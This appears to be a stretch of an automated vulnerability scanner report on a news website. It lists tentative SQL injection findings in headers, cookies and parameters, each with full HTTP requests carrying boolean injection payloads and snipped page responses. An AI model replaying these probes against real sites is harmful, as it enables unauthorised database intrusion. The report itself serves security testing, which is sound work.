GET /ci_16790963?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D43929352'%20or%201%3d2--%20; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Antioch police say that pair likely had been arguing before attack'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Woman stabbed to death in Antioch; suspect arrested - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNGiRegistrationUrl = "https://secure.www.contracostatime ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the Referer HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16791142 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2; Referer: http://www.google.com/search?hl=en&q='%20and%201%3d1--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.passport.mnginteractive.com/mngi/servletDispatch/ErightsPassportServlet.dyn"; MNG ...[SNIP]...
Request 2
GET /ci_16791142 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2; Referer: http://www.google.com/search?hl=en&q='%20and%201%3d2--%20
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='Gift-wrapping falls out of favor to gift bags and greener times'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Ghost of Christmas past - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
The currBrandCheck cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the currBrandCheck cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16792343?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d1--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><scri ...[SNIP]...
Request 2
GET /ci_16792343?source=most_viewed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes'%20and%201%3d2--%20; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The owners of the El Balazo restaurant chain have been charged with 20 counts of tax evasion, conspiracy and employing more than 60 illegal immigrants at their restaurants.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Owners of El Balazo restaurant chain charged with tax fraud and hiring illegal immigrants - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https:/ ...[SNIP]...
The u cookie appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the u cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /ci_16792616?source=most_emailed HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B'%20and%201%3d1--%20; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='PayPal co-founder Peter Thiel is convening an unusual philanthropic summit where hell introduce wealthy tech figures to nonprofit groups exploring such ideas as artificial intelligence, extending human life and building communities on the high seas.'><meta name="keywords" content="contra costa times antioch brentwood concord walnut creek richmond jobs cars homes apartments el cerrito albany hot coco"/><title>Silicon Valley billionaire backs futuristic philanthropy - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.Home"; var CM8Profile="";
</script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/ ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 10497043'%20or%201%3d1--%20 and 10497043'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d1--%20 Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get pr ...[SNIP]...
Request 2
GET /news/ci_16783847?source=rss&nclick_check=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)10497043'%20or%201%3d2--%20 Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='The red- and green-dressed festive drinkers are participating in SantaCon, an annual national event involving people dressing up in Santa costumes and taking to the streets, which in San Francisco began in 1994.'><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Hundreds don red suits for SantaCon in San Francisco - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistration ...[SNIP]...
The EMETA_COOKIE_CHECK_MNGI cookie appears to be vulnerable to SQL injection attacks. The payloads 17543039%20or%201%3d1--%20 and 17543039%20or%201%3d2--%20 were each submitted in the EMETA_COOKIE_CHECK_MNGI cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d1--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language ...[SNIP]...
Request 2
GET /news/ci_16791147?source=rss&nclick_check=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=117543039%20or%201%3d2--%20; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.pas ...[SNIP]...
1.142. http://www.contracostatimes.com/news/ci_16791147 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.contracostatimes.com
Path:
/news/ci_16791147
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 23783182%20or%201%3d1--%20 and 23783182%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16791147?123783182%20or%201%3d1--%20=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language ...[SNIP]...
Request 2
GET /news/ci_16791147?123783182%20or%201%3d2--%20=1 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><META NAME='description' CONTENT='In recent years, home brewing has gone from a one-time illegal practice to a hobby and business that has inspired clubs, organizations and competitions such as the one at the Beer Revolution. '><meta name="keywords" content="news newsmainfront breaking crime accident police development city council government strike court disaster environment breaking news"/><title>Home brewing on the rise in the Bay Area - ContraCostaTimes.com</title><meta name="verify-v1" content="9dwSr9Yve34JXLjszyjsdM95FWP13xu2vUbiVSesr2I=" /> <meta name="msvalidate.01" content="9DAB14005AD5A9FFA4CA0EF58CC794BA" />
<Script language="JavaScript"> var CM8Server = "q1.checkm8.com"; var CM8Cat = "contracostatimes.News.Front"; var CM8Profile=""; </script> <SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT><!-- get profile info --><!-- user not logged in (javascript) --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginStatus = "out"; MNGiRegistrationUserName = ""; MNGiRegistrationEmail = ""; </script><!-- end get profile info --><script language="JavaScript" type="text/javascript"> MNGiRegistrationLoginUrl = "https://secure.pas ...[SNIP]...
The nclick_check parameter appears to be vulnerable to SQL injection attacks. The payloads 33516214'%20or%201%3d1--%20 and 33516214'%20or%201%3d2--%20 were each submitted in the nclick_check parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /news/ci_16792343?source=rss&nclick_check=133516214'%20or%201%3d1--%20 HTTP/1.1 Host: www.contracostatimes.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UserType=Browser; currBrandCheck=mngicctimes; s_cc=true; SOURCE=top-hp-promo-box-photo; u=COOKIE_NAME%3Du%3BuserIdChange%3Dtrue%3BuserId%3DZ4PETROM1AFIICUUCBWCFFI%3BconPage%3Dfalse%3BaaPage%3Dfalse%3BloginConPage%3Dfalse%3BfPage%3Dtrue%3BfVisit%3Dtrue%3BvType%3D1%3BlVisit%3D1291762325530%3BcVisit%3D1291762325530%3BinitRegType%3DVoluntary%3B; JSESSIONID=Z4PETROM1AFIICUUCBWCFFI; EMETA_COOKIE_CHECK_MNGI=1; s_sq=%5B%5BB%5D%5D; UserID=Z4PETROM1AFIICUUCBWCFFI; fPage=true; EMETA_NCLICK_MNGI=2;
